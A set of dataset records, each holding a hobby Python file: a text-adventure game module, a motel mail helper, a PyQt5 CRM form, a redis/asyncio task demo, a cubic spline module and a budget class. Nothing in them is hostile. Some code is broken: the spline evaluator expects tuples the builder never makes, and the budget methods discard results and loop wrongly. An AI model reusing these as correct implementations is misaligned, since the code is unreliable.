self.view = \"travel\"\n self.imageIndex = 22\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def goldMine1(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 23\n self.text = None\n self.helpText = None\n self.menu = []\n\n goldMineId = 1\n \n return self.goldMineMain(goldMineId, selectionIndex)\n\n def goldMine2(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 23\n self.text = None\n self.helpText = None\n self.menu = []\n\n goldMineId = 2\n \n return self.goldMineMain(goldMineId, selectionIndex)\n\n def goldMine3(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 23\n self.text = None\n self.helpText = None\n self.menu = []\n\n goldMineId = 3\n \n return self.goldMineMain(goldMineId, selectionIndex)\n\n def goldMine4(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 23\n self.text = None\n self.helpText = None\n self.menu = []\n\n goldMineId = 4\n \n return self.goldMineMain(goldMineId, selectionIndex)\n\n def goldMineMain(self, goldMineId, selectionIndex):\n if selectionIndex == 0:\n roll = random.randint(1, 5)\n if roll == 1:\n self.text = (\"You mine some gold ore!\")\n self.c.flags['Gold Mined'][goldMineId] = self.c.level+1\n return self.actions({'item': \"Gold Ore\"})\n else:\n hpLoss = random.randint(10, 50)\n if self.c.isPolite:\n ouchLine = \"\\n%s: Yow!\" % self.c.NAME\n else:\n ouchLine = \"\\n%s: Fuck!\" % self.c.NAME\n self.text = (\"You swing your weapon at the rock, recoiling\"\n \" and injuring\"+\n \" yourself for %s damage.\" % hpLoss+\n ouchLine)\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += random.choice(\n [\"\\nQendresa: Be careful.\",\n \"\\nQendresa: Try again, you are almost there.\",\n \"\\nQendresa: Shall I take a swing?\" +\n \"\\n%s: I've got it.\" % self.c.NAME])\n self.c.hp -= hpLoss\n self.menu = [\"Mine the gold rock.\"]\n elif self.c.level > self.c.flags['Gold Mined'][goldMineId]:\n self.text = \"You come across a rock containing rare gold ore.\"\n self.menu = [\"Mine the gold rock.\"]\n else:\n self.text = \"You see a mined gold rock.\"\n return self.actions()\n\n def hotCoalsTeacher(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 5\n self.text = None\n self.helpText = None\n self.menu = []\n npc = \"Mysterious Red Wizard\"\n skill = \"Hot Coals\"\n if skill+\" Learned\" in self.c.flags:\n if selectionIndex == 0:\n return self.actions({'skill': \"Hot Coals\",\n 'cost': 0})\n self.text = \"You feel the remnants of a magical presence in this area.\"\n self.menu = [\"Absorb some magical remnants.\"]\n elif selectionIndex == 0:\n self.text = (\"%s: I'm not a big cowboy, but ok.\" % self.c.NAME+\n \"\\n\"+npc+\": Hserf tae!\"+\n \"\\nThe wizard flicks his wand and teleports away.\")\n self.c.flags[skill] = True\n self.c.flags[skill+\" Learned\"] = True\n return self.actions({'skill': skill,\n 'cost': 0})\n elif selectionIndex == 1:\n random.seed(self.c.level)\n self.text = (\"%s: No way in hell, you psycho!\" % self.c.NAME+\n \"\\n%s: So be it. 
Fartface.\" % npc+\n \"\\nThe wizard teleports away, leaving magic dust.\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: That guy was a knucklehead.\")\n randomHpBoost = random.randint(-5, 15)\n if randomHpBoost < 0:\n self.text += (\"\\nYour maximum HP decreased by %s!\" % -randomHpBoost)\n elif randomHpBoost > 0:\n self.text += (\"\\nYour maximum HP increased by %s!\" % randomHpBoost)\n self.c.maxHp += randomHpBoost\n self.c.flags[skill] = True\n elif skill not in self.c.flags:\n self.imageIndex = 24\n self.c.flags['New Song'] = \"Buddha\"\n self.text = (npc+\": Howdy, big cowboy. Wanna \"+\n \"fill that noggin with knowledge?\")\n self.menu = [\"\\\"Yes.\\\"\",\n \"\\\"No!\\\"\"]\n return self.actions()\n\n def well1(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 25\n self.text = None\n self.helpText = None\n self.menu = []\n if selectionIndex == 0:\n event = random.choice([\"Energy\", \"Heal\", \"Poison\"])\n self.text = \"You drink some water. \"\n if event == \"Energy\":\n self.text += (\"You feel re-energized.\")\n self.c.ep += 20\n elif event == \"Heal\":\n self.text += (\"You feel restored.\")\n self.c.hp += 20\n elif event == \"Poison\":\n self.text += (\"You feel sick.\")\n self.c.hp -= 30\n else:\n self.text = (\"You come across an old well.\")\n if \"Well\" not in self.c.flags:\n self.text = (\"\\n%s: This is familiar.\" % self.c.NAME)\n self.c.flags['Well'] = True\n self.menu = [\"Drink from the well.\"]\n return self.actions()\n\n def well2(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 26\n self.text = None\n self.helpText = None\n self.menu = []\n if selectionIndex == 0:\n event = random.choice([\"Energy\", \"Heal\", \"Chunk\"])\n self.text = \"You drink some water. 
\"\n if event == \"Energy\":\n self.text += (\"You feel re-energized.\")\n self.c.ep += 20\n elif event == \"Heal\":\n self.text += (\"You feel restored.\")\n self.c.hp += 20\n elif event == \"Chunk\":\n self.text += (\"There is a chunk of dirt in it.\")\n self.c.hp -= 30\n else:\n self.text = (\"You come across a dusty well.\")\n if \"Well\" not in self.c.flags:\n self.text = (\"\\n%s: This is familiar.\" % self.c.NAME)\n self.c.flags['Well'] = True\n self.menu = [\"Drink from the well.\"]\n return self.actions()\n\n def castle(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 27\n self.text = None\n self.helpText = None\n self.menu = []\n if selectionIndex == 0:\n X = 1\n Y = 13\n return self.actions({'area': \"Gambino Castle\",\n 'coordinates': (X, Y)})\n if \"Gambino Castle\" not in self.c.flags:\n self.text = (\"%s: Why is there a giant castle in the middle of\" % self.c.NAME +\n \" the desert?\")\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += (\"\\nQendresa: This...this must be the hiding\" +\n \" place of that despicable Italian president.\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: That's a weird place to live.\")\n self.c.flags['Gambino Castle'] = True\n self.menu = [\"Enter the castle.\"]\n return self.actions()\n\n def wall1(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 28\n self.text = None\n self.helpText = None\n self.menu = []\n return self.wall(selectionIndex)\n\n def wall2(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 29\n self.text = None\n self.helpText = None\n self.menu = []\n return self.wall(selectionIndex)\n\n def wall(self, selectionIndex=None):\n if ( selectionIndex == 0 and\n \"Greek Wall Hole\" not in self.c.flags):\n self.text = (\"You swing at the crack and a large pile of stone\" +\n \" crumbles from the wall.\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: That's how you make an entrance!\")\n self.menu = [\"Enter the wall.\"]\n self.c.flags['Greek Wall Hole'] = True\n elif (selectionIndex == 0 and\n \"Greek Wall Hole\" in self.c.flags):\n X = 1\n Y = 2\n return self.actions({'area': \"Hidden Passage\",\n 'coordinates': (X, Y)})\n elif (\"Blueprint\" not in self.c.flags and\n \"Greek Wall\" not in self.c.flags):\n self.text = (\"You reach a massive wall bordering Greece.\" +\n \"\\n%s: If only I could find a way around this\" % self.c.NAME +\n \" wall.\")\n self.c.flags['Greek Wall'] = True\n elif (\"Blueprint\" in self.c.flags and\n \"Greek Wall Hole\" not in self.c.flags):\n self.text = (\"%s: Ok, so it says on the blueprint\" % self.c.NAME +\n \" that there should be a hole at this crack.\")\n self.menu = [\"Hit the crack.\"]\n elif \"Greek Wall Hole\" in self.c.flags:\n self.menu = [\"Enter the wall.\"]\n return self.actions()\n \n def geyser(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 30\n self.text = None\n self.helpText = None\n self.menu = []\n \n if selectionIndex == 0:\n self.c.flags['Plugged Geyser'] = True\n if \"Oukkar\" in self.c.flags['Kills']:\n self.c.removeItem(self.c.indexOfItem(\"Olympian Ointment\"))\n self.c.flags['Volcano Ointment'] = True\n X = 2\n Y = 27\n return self.actions({'area': \"Albanian Desert\",\n 'coordinates': (X, Y),\n 'sound': \"Unlock Area\"})\n elif \"Plugged Geyser\" not in self.c.flags:\n self.c.flags['Oukkar Entrance Found'] = True\n self.text = (\"There is a large geyser blocking the way.\" +\n \" The pressure\" +\n \" is too strong to be stopped by 
physical means.\")\n if \"Hailstorm\" in [skill.NAME for skill in self.c.skills]:\n self.menu = [\"Cast Hailstorm.\"]\n elif \"Plugged Geyser Aftermath\" not in self.c.flags:\n self.imageIndex = 31\n self.text = (\"You form a layer of ice atop the geyser.\")\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += (\"\\nQendresa: Yaouw!\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: That's a funny noise.\")\n self.text += (\"\\nQendresa: No, look to the horizon.\" +\n \"\\nQendresa points to a volcano in the distance.\")\n elif self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: Way to stay coolheaded...in a\" +\n \" heated situation.\")\n self.c.flags['Plugged Geyser Aftermath'] = True\n elif \"Oukkar\" not in self.c.flags['Kills']:\n self.imageIndex = 31\n self.text = (\"There is a magical force far ahead.\")\n elif \"Volcano Ointment\" in self.c.flags:\n self.imageIndex = 31\n if \"Volcano Ointment Aftermath\" in self.c.flags:\n self.text = \"You see Yaouw Volcano in the distance.\"\n else:\n self.c.flags['Volcano Ointment Aftermath'] = True\n self.text = \"You apply a vial of Olympian Ointment to the area.\"\n if self.c.hasMercenary(\"Barrie\"):\n self.text += \"\\nBarrie: And what do you think that's gonna do?\"\n self.text += \"\\nYaouw Volcano re-emerges!\"\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += (\"\\nQendresa: Yaouw!\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += \"\\nBarrie: Wow. Really didn't expect that to work.\"\n elif \"Niplin\" not in self.c.flags['Kills']:\n self.imageIndex = 32\n if \"Volcano Aftermath\" not in self.c.flags:\n self.c.flags['Volcano Aftermath'] = True\n self.text = (\"You slide down the mountain. The volcano collapses behind you.\")\n else:\n self.text = (\"The hot sun still shines mightily.\")\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += (\"\\nQendresa: Come, let us continue our quest.\")\n if self.c.hasItem(\"Olympian Ointment\") and \"Volcano Ointment\" not in self.c.flags:\n self.menu = [\"Apply Olympian Ointment.\"]\n else:\n self.imageIndex = 33\n self.text = (\"You stare into the horizon in wonder.\")\n if self.c.hasItem(\"Olympian Ointment\") and \"Volcano Ointment\" not in self.c.flags:\n self.menu = [\"Apply Olympian Ointment.\"]\n elif self.c.hasMercenary(\"Qendresa\"):\n self.text += random.choice(\n [\"\\nQendresa: We have certainly come a long way.\",\n \"\\nQendresa: What are you thinking about?\",\n \"\\nQendresa: Yaouw once stood here.\"]\n )\n\n return self.actions()\n \n def alpaca(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 34\n self.text = None\n self.helpText = None\n self.menu = []\n if selectionIndex == 0:\n X = 6\n Y = 9\n return self.actions({'area': \"Yaouw Volcano\",\n 'coordinates': (X, Y)})\n if \"Oukkar\" not in self.c.flags['Kills']:\n self.text = (\"Alpaca: Wehh...\" +\n \"\\nIt looks like there is transportation\" +\n \" conveniently waiting for you.\")\n self.menu = [\"Ride the alpaca up to the volcano.\"]\n elif \"Volcano Ointment\" in self.c.flags:\n self.text = \"Alpaca: Wehh...\"\n self.menu = [\"Ride the alpaca up to Yaouw Volcano.\"]\n return self.actions()\n","repo_name":"1bengardner/toshes-quest-ii","sub_path":"source/TUAAlbanianDesert.py","file_name":"TUAAlbanianDesert.py","file_ext":"py","file_size_in_byte":32219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"74343981390","text":"\"\"\"\nx = input(\"number 1\")\ny = input(\"number 2\")\n\ndef re_cap(x,y):\n 
if x>y:\n print(y,\"is smaller\")\n elif x\n \n ''' + si18n.translate('Name') + '''\n ''' + name + '''\n \n \n ''' + si18n.translate('Email') + '''\n ''' + email + '''\n \n \n ''' + si18n.translate('Message') + '''\n ''' + message + '''\n \n \n '''\n pass\n\n\ndef send_mails_for_new(booking):\n subject = 'Your booking request at Ferdinand Motel '\n # To client\n booking_info = build_booking_info(booking)\n (subject, body) = render_mail_template('new_client', booking_info)\n\n send_mail(\n si18n.translate('Ferdinand Motel') + '<' + get_sender() + '>',\n booking.user.full_name + '<' + booking.user.email + '>',\n subject,\n body)\n\n (subject, body) = render_mail_template('new_admin', booking_info)\n\n send_mail(\n si18n.translate('Ferdinand Motel') + '<' + get_sender() + '>',\n ', '.join(get_admin_mails()),\n subject,\n body)\n pass\n\n\ndef send_acceptance_mail(booking, mail_data):\n # To client\n message = mail.EmailMessage(\n sender=si18n.translate('Ferdinand Motel') +\n '<' + get_sender() + '>',\n subject=mail_data['subject']\n )\n\n message.to = booking.user.full_name + '<' + booking.user.email + '>'\n message.html = mail_data['body']\n message.send()\n\n\ndef build_booking_info(booking):\n bldr = BookingDictBuilder(booking)\\\n .with_user()\\\n .with_bookable()\n booking = bldr.bk\n bi = bldr.build()\n\n nights = (booking.end - booking.start).days\n\n bi['currencyClient'] = bi['currency']\n bi['priceClient'] =\\\n currency.convert(\n booking.price,\n bi['currency'],\n json.loads(booking.rates))\n bi['pricePerNightClient'] = math.ceil(bi['priceClient'] / nights)\n bi['priceClient'] = bi['pricePerNightClient'] * nights\n bi['nrOfNights'] = nights\n\n return bi\n\n\ndef render_mail_template(which, booking_info):\n key_base = 'mail.' + which + '.' + si18n.get_lang_id()\n subject_template = unicode(prop.get_all_props()[key_base + '.subject'])\n body_template = unicode(prop.get_all_props()[key_base + '.body'])\n\n return (\n render(subject_template, booking_info),\n render(body_template, booking_info)\n )\n\n\ndef render(string, booking_info):\n lang_id = si18n.get_lang_id()\n string = iterate_and_replace(string, 'user', booking_info['user'])\n string = iterate_and_replace(\n string,\n 'bookable.i18n',\n booking_info['bookable']['i18n'][lang_id])\n string = iterate_and_replace(string, 'bookable', booking_info['bookable'])\n string = iterate_and_replace(string, 'booking', booking_info)\n return string\n\n\ndef iterate_and_replace(string, base, dct):\n for k in dct:\n rk = r'#' + base + r'\\.' 
+ k + r'\\b'\n string = re.sub(rk, unicode(dct[k]), string)\n return string\n\n\ndef send_mail(ffrom, to, subject, body, reply_to=''):\n message = mail.EmailMessage(sender=ffrom, subject=subject)\n message.to = to\n message.html = body\n if not reply_to == '':\n message.reply_to = reply_to\n message.send()\n\n\ndef get_sender():\n return 'albertmatyi@gmail.com'\n\n\ndef get_admin_mails():\n return [\n 'Developer ',\n ', Owner '\n ]\n","repo_name":"albertmatyi/motelferdinand","sub_path":"application/helpers/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"16816932714","text":"from PyQt5.QtWidgets import *\nfrom App.SQLite_Database import add_client_data, add_actions_data, nb_actions_data\nfrom datetime import datetime\n\n\nclass NewClient(QWidget):\n\n \"\"\"THE NewClient APPLICATION WINDOW.\n\n DISPLAY A WINDOW TO REGISTER ALL THE CLIENT INFORMATION AND SAVE IT IN THE SQL FILE data_clients AND\n IN THE MAIN SQL FILE FOR ALL THE ACTIONS EXECUTED\n\n REMARK : THE SQL FILE HAS TO BE CREATED BEFORE TO PROCESS, RUN THE FUNCTION FROM A DIFFERENT FILE IN THE FOLDER.\n YOU WILL FIND THE FUNCTION IN THE SQLite_Database.py.\n \"\"\"\n\n def __init__(self, Crm):\n super(NewClient, self).__init__()\n\n \"\"\"SET THE NewClient WINDOW AND Crm AS THE PARENT\"\"\"\n\n self.Crm = Crm\n\n self.setWindowTitle(\"ADD CLIENT\")\n\n self.grid = QGridLayout()\n self.setLayout(self.grid)\n\n self.home()\n\n def home(self):\n\n \"\"\"SET ALL THE WIDGETS OF THE NewClient WINDOW\"\"\"\n\n label_client_f_name = QLabel(\"Client first name:\", self)\n self.grid.addWidget(label_client_f_name, 0, 0)\n self.box_client_f_name = QLineEdit(self)\n self.grid.addWidget(self.box_client_f_name, 0, 1)\n\n label_client_l_name = QLabel(\"Client last name:\", self)\n self.grid.addWidget(label_client_l_name, 1, 0)\n self.box_client_l_name = QLineEdit(self)\n self.grid.addWidget(self.box_client_l_name, 1, 1)\n\n label_client_email = QLabel(\"Client email:\", self)\n self.grid.addWidget(label_client_email, 2, 0)\n self.box_client_email = QLineEdit(self)\n self.grid.addWidget(self.box_client_email, 2, 1)\n\n label_client_phone_mobile = QLabel(\"Client mobile phone:\", self)\n self.grid.addWidget(label_client_phone_mobile, 3, 0)\n self.box_client_phone_mobile = QLineEdit(self)\n self.grid.addWidget(self.box_client_phone_mobile, 3, 1)\n\n label_client_phone_home = QLabel(\"Client home phone:\", self)\n self.grid.addWidget(label_client_phone_home, 4, 0)\n self.box_client_phone_home = QLineEdit(self)\n self.grid.addWidget(self.box_client_phone_home, 4, 1)\n\n label_client_address = QLabel(\"Client address:\", self)\n self.grid.addWidget(label_client_address, 5, 0)\n\n label_client_address_country = QLabel(\"Country/Region:\", self)\n self.grid.addWidget(label_client_address_country, 6, 1)\n self.box_client_address_country = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_country, 6, 2)\n\n label_client_address_street = QLabel(\"Street address:\", self)\n self.grid.addWidget(label_client_address_street, 7, 1)\n self.box_client_address_street = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_street, 7, 2)\n\n label_client_address_city = QLabel(\"City:\", self)\n self.grid.addWidget(label_client_address_city, 8, 1)\n self.box_client_address_city = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_city, 8, 2)\n\n label_client_address_province = 
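The render/iterate_and_replace pair above substitutes '#base.key' placeholders with re.sub; the same idea in a self-contained form (the function and sample names here are ours, not from the module):

import re

def render_placeholders(template, base, values):
    # Replace each '#base.key' token; \b stops 'name' from also eating 'names'.
    for key, value in values.items():
        pattern = r'#' + re.escape(base) + r'\.' + re.escape(key) + r'\b'
        template = re.sub(pattern, str(value), template)
    return template

print(render_placeholders('Dear #user.name (#user.email)', 'user',
                          {'name': 'Ada', 'email': 'ada@example.org'}))
# Dear Ada (ada@example.org)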
QLabel(\"Province/Territory:\", self)\n self.grid.addWidget(label_client_address_province, 9, 1)\n self.box_client_address_province = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_province, 9, 2)\n\n label_client_address_postal = QLabel(\"Postal code:\", self)\n self.grid.addWidget(label_client_address_postal, 10, 1)\n self.box_client_address_postal = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_postal, 10, 2)\n\n label_client_option = QLabel(\"Client option:\", self)\n self.grid.addWidget(label_client_option, 11, 0)\n\n self.check_client_option_news_letter = QCheckBox(\"News letter\", self)\n self.grid.addWidget(self.check_client_option_news_letter, 11, 1)\n\n self.check_client_option_other = QCheckBox(\"Other\", self)\n self.grid.addWidget(self.check_client_option_other, 11, 2)\n\n self.btn_client_add = QPushButton(\"Add\", self)\n self.grid.addWidget(self.btn_client_add, 12, 0, 12, 3)\n self.btn_client_add.clicked.connect(self.btn_add_on)\n\n def btn_add_on(self):\n\n \"\"\"GET ALL THE DATA AND IMPLEMENT IT IN THE SQL FILE\"\"\"\n\n date = datetime.today()\n\n if self.check_client_option_news_letter.isChecked():\n news_letter = \"True\"\n else:\n news_letter = \"False\"\n\n if self.check_client_option_other.isChecked():\n option = \"True\"\n else:\n option = \"False\"\n\n choice = QMessageBox.question(self, \"Execute\", \"Do you want to add this client ?\",\n QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n\n if choice == QMessageBox.Yes:\n\n add_client_data(self.box_client_f_name.text().upper(),\n self.box_client_l_name.text().upper(),\n self.box_client_email.text().lower(),\n self.box_client_phone_mobile.text().upper(),\n self.box_client_phone_home.text().upper(),\n self.box_client_address_country.text().upper(),\n self.box_client_address_street.text().upper(),\n self.box_client_address_city.text().upper(),\n self.box_client_address_province.text().upper(),\n self.box_client_address_postal.text().upper(),\n news_letter,\n option)\n\n self.Crm.message_box.append(f\"The client {self.box_client_f_name.text().upper()} \"\n f\"{self.box_client_l_name.text().upper()} has been added the \"\n f\"{date}\")\n\n nb = nb_actions_data()\n\n add_actions_data(nb, \"CLIENT ADDED\", date, self.box_client_f_name.text().upper(), self.box_client_l_name.text().upper())\n\n else:\n pass\n\n","repo_name":"srevinU/CRM_Program_GUI_PyQt5_SQL_Data","sub_path":"A_Client.py","file_name":"A_Client.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"9781326318","text":"import redis\nimport time\n \nif __name__ == '__main__':\n print('web start to work')\n rcon = redis.StrictRedis(host='localhost', db=5)\n task_queue = 'task:prodcons:task_queue'\n result_queue = 'task:prodcons:result_queue'\n try:\n while True:\n str_time = time.asctime()\n codes = ['Aron', 'Bob', 'Mike', 'John', 'Ian']\n str_codes = ','.join(codes)\n rcon.rpush(task_queue, str_codes)\n print(\"Task create: {}, at {}\".format(str_codes, str_time))\n print('Now waiting crawler to feedback the data')\n start_time = time.time()\n codes_crawler_result = {}\n while start_time + 8 - time.time() > 0 :\n #time.sleep(20)\n code = rcon.blpop(result_queue, 1)\n if not code:\n continue\n code = code[1].decode('utf-8')\n codes_crawler_result[code] = rcon.get('ssxx_{}'.format(code))\n print(' Task Result from queue:', code , ' at ', time.asctime(), ' reulst is:', codes_crawler_result[code])\n if len(codes) == 
len(codes_crawler_result):\n print(' *All task result is OK now, break the while loop:', time.time() - start_time )\n break\n else:\n print(' ****only {} task result is ok: '.format(len(codes_crawler_result)), time.time() - start_time )\n \n except KeyboardInterrupt:\n pass\n \n \n \nimport redis\nimport time\nimport random\nimport asyncio\n\ntask_queue = 'task:prodcons:task_queue'\nresult_queue = 'task:prodcons:result_queue'\n \n#class Task(object):\n# def __init__(self):\n# self.rcon = redis.StrictRedis(host='localhost', db=5)\n# self.queue = 'task:prodcons:queue'\n# \n# def product_task(self):\n# while True:\n# str_time = time.asctime()\n# task = self.rcon.rpush(self.queue, str_time)\n# coffee_time = random.randint(1,20)\n# print(\"Task create: {}, and will have a coffee for {}s\".format(task, coffee_time))\n# time.sleep(coffee_time)\n#\n\nasync def crawler(code):\n coffee_time = random.randint(1,10)\n await asyncio.sleep(coffee_time)\n rcon.setex('ssxx_{}'.format(code), 5, '{} result at {}'.format(code, time.asctime()))\n #rcon.set('ssxx_{}'.format(code), '{} result at {}'.format(code, time.asctime()))\n rcon.rpush(result_queue, code)\n print('Task {} result at {}'.format(code, time.asctime()), \" it takes \", coffee_time, ' s')\n\ndef done_callback(futu):\n print('Done')\n \nif __name__ == '__main__':\n print('crawler start to work')\n rcon = redis.StrictRedis(host='localhost', db=5)\n loop = asyncio.get_event_loop()\n cnt_task = 0\n try:\n while True:\n str_time = time.asctime()\n codes = rcon.blpop(task_queue, 1)\n if not codes:\n continue\n codes = codes[1].decode('utf-8').split(',')\n print('##Task from queue:', codes , ' at ', str_time)\n #tasks = [ crawler(code) for code in codes ]\n #loop.run_until_complete(crawler('1'))\n #futu = asyncio.ensure_future(crawler('1'))\n #futu.add_done_callback(done_callback)\n \n #loop.run_until_complete(futu)\n tasks = []\n for code in codes:\n futu = asyncio.ensure_future(crawler(code))\n futu.add_done_callback(done_callback)\n tasks.append(futu)\n loop.run_until_complete(asyncio.gather(*tasks))\n \n cnt_task = cnt_task + 1\n print(\"##All task done. 
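Stripped of redis, the concurrency core of the crawler above is ensure_future plus gather; the same fan-out/join in isolation, with asyncio.sleep standing in for the real fetch:

import asyncio
import random

async def crawl(code):
    await asyncio.sleep(random.random())  # stand-in for network work
    return '{} result'.format(code)

async def crawl_all(codes):
    tasks = [asyncio.ensure_future(crawl(c)) for c in codes]
    return await asyncio.gather(*tasks)

print(asyncio.run(crawl_all(['Aron', 'Bob', 'Mike'])))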
{}\".format(cnt_task))\n except KeyboardInterrupt:\n pass\n","repo_name":"mistakeking/gitskills","sub_path":"test_asynoio.py","file_name":"test_asynoio.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"44062296275","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef makeHValues(dataX):\n size = len(dataX)-1\n result = np.zeros(size)\n for i in range(0,size):\n result[i] = (dataX[i+1]-dataX[i])\n return np.array(result)\n\ndef makeGammaVector(dataY,dataH):\n size = len(dataY)-2\n result = np.zeros(size+2)\n for i in range(0,size):\n result[i] = (dataY[i+2] - dataY[i+1])/dataH[i+1] - (dataY[i+1]-dataY[i])/dataH[i]\n return result\n\ndef makeMatrix(dataX, dataY, dataH):\n size = len(dataX)\n result = np.zeros((size, size))\n # điều kiện ma trận\n for i in range(0,size-2):\n result[i,i] = dataH[i]/6\n result[i,i+1] = (dataH[i]+dataH[i+1])/3\n result[i,i+2] = dataH[i+1]/6 \n return result\n\ndef naturalSpline(matrix, h_vector ,gamma_vector, dataY):\n matrix[-2,0] = 1\n gamma_vector[-2] = 0\n matrix[-1,-1] = 1\n gamma_vector[-1] = 0\n\ndef calculateCubic(a,b,c,d,x):\n return d+x*(c+x*(b+x*a))\n\ndef makeAllCubicFunctions(dataX, dataY, dataH, alphas):\n all_splines = []\n for k in range (0,len(alphas)-1):\n a = (alphas[k+1] - alphas[k])/(6*dataH[k])\n b = (3*alphas[k]*dataX[k+1]-3*alphas[k+1]*dataX[k])/(6*dataH[k])\n c = (-3*alphas[k]*dataX[k+1]**2+3*alphas[k+1]*dataX[k]**2)/(6*dataH[k]) + (dataY[k+1]-dataY[k])/dataH[k] - (alphas[k+1]-alphas[k])*dataH[k]/6\n d = (alphas[k]*dataX[k+1]**3 - alphas[k+1]*dataX[k]**3)/(6*dataH[k]) + (dataY[k]*dataX[k+1]-dataY[k+1]*dataX[k])/dataH[k] + (alphas[k+1]*dataX[k]-alphas[k]*dataX[k+1])*dataH[k]/6\n all_splines.append((a,b,c,d))\n return all_splines\n\n# Create \"Natural Spline\", return its coef, start point and end point of the polynomial.\ndef mainNaturalCubicSpline(dataX, dataY):\n dataH = makeHValues(dataX)\n gamma_vector = makeGammaVector(dataY,dataH)\n gamma_vector = np.transpose(np.array(gamma_vector))\n matrix = makeMatrix(dataX,dataY,dataH)\n naturalSpline(matrix, dataH,gamma_vector,dataY)\n print(matrix)\n print(gamma_vector)\n alphas = np.matmul(np.linalg.inv(matrix),gamma_vector)\n all_splines = makeAllCubicFunctions(dataX,dataY,dataH,alphas)\n return all_splines\n\n# Draw cubic spline in graph\ndef plotCubicSpline(dataX, dataY, all_cubic_polynomials):\n plt.scatter(dataX,dataY)\n for i in range(0,len(dataX)-1):\n a,b,c,d = all_cubic_polynomials[i]\n dataX_i = np.linspace(dataX[i], dataX[i+1],11)\n dataY_i = [calculateCubic(a,b,c,d,x) for x in dataX_i]\n plt.plot(dataX_i,dataY_i)\n plt.show()\n\n# Calculate point value on the cubic spline.\ndef calculateCubicSplineAtPoint(all_cubic_polynomials, x):\n for ((a,b,c,d), start, end) in all_cubic_polynomials:\n if(start < x and end > x ):\n return calculateCubic(a,b,c,d,x)\n return all_cubic_polynomials \n\n# Return a lambda, that will ensure root finding.\ndef getCubicSpline(all_cubic_polynomials):\n return lambda x : calculateCubicSplineAtPoint(all_cubic_polynomials, x)\n\n","repo_name":"manh354/PhuongPhapSoNew","sub_path":"src/interpolation/spline.py","file_name":"spline.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"35143760059","text":"class Budget:\n '''This is a budget app'''\n\n def __init__(self, name, size):\n self.budget_name = name\n self.budget_size = size\n\n def 
deposit(self):\n print(f'How much would you like to add to the budget of {self.budget_size}? \\n')\n dep_funds = int(input())\n print(f'Do you want to approve the deposit of {dep_funds}? \\n')\n print('Press 1 to approve and 2 to cancel')\n auth = int(input())\n while not auth:\n if auth == 1:\n auth == True\n print('Deposit approved!')\n if auth == 2:\n auth == True\n print('Cancelled!')\n else:\n print('Invalid Selection')\n break\n\n def withdraw(self):\n # Withdraw funds from any of the budget categories\n print('How much would you like to withdraw? \\n')\n amt_withdraw = int(input())\n print('What category do you want to withdraw from? \\n')\n print('1. Food 2. Clothing 3. Data 4. Entertainment 5. Healthcare \\n')\n cat_withdraw = int(input())\n\n if amt_withdraw <= budget_1.budget_size:\n print('Successful')\n self.homepage(self)\n elif amt_withdraw <= budget_2.budget_size:\n print('Successful')\n self.homepage(self)\n elif amt_withdraw <= budget_3.budget_size:\n print('Successful')\n self.homepage(self)\n elif amt_withdraw <= budget_4.budget_size:\n print('Successful')\n self.homepage(self)\n elif amt_withdraw <= budget_5.budget_size:\n print('Successful')\n self.homepage(self)\n else:\n print('Insufficient funds in target category')\n self.homepage(self)\n\n\n def balance(self):\n # Return balance for any budget category when called in respect to that category\n print('What budget category would you want to see balance left \\n')\n print('1. Food 2. Clothing 3. Data 4. Entertainment 5. Healthcare \\n')\n bal_category = int(input())\n if bal_category == 1:\n return budget_1.budget_size\n elif bal_category == 2:\n return budget_2.budget_size\n elif bal_category == 3:\n return budget_3.budget_size\n elif bal_category == 4:\n return budget_4.budget_size\n elif bal_category == 5:\n return budget_5.budget_size\n else:\n pass\n\n def transfer(self):\n # Transfer funds between different categories and return balances\n print('How much would you like to transfer? \\n')\n amt_transfer = int(input())\n print('What budget category would you like to transfer to?')\n print('1. Food 2. Clothing 3. Data 4. Entertainment 5. Healthcare \\n')\n cat_transfer = int(input())\n if cat_transfer == 1:\n amt_transfer + budget_1.budget_size\n return\n elif cat_transfer == 2:\n amt_transfer + budget_2.budget_size\n return\n elif cat_transfer == 3:\n amt_transfer + 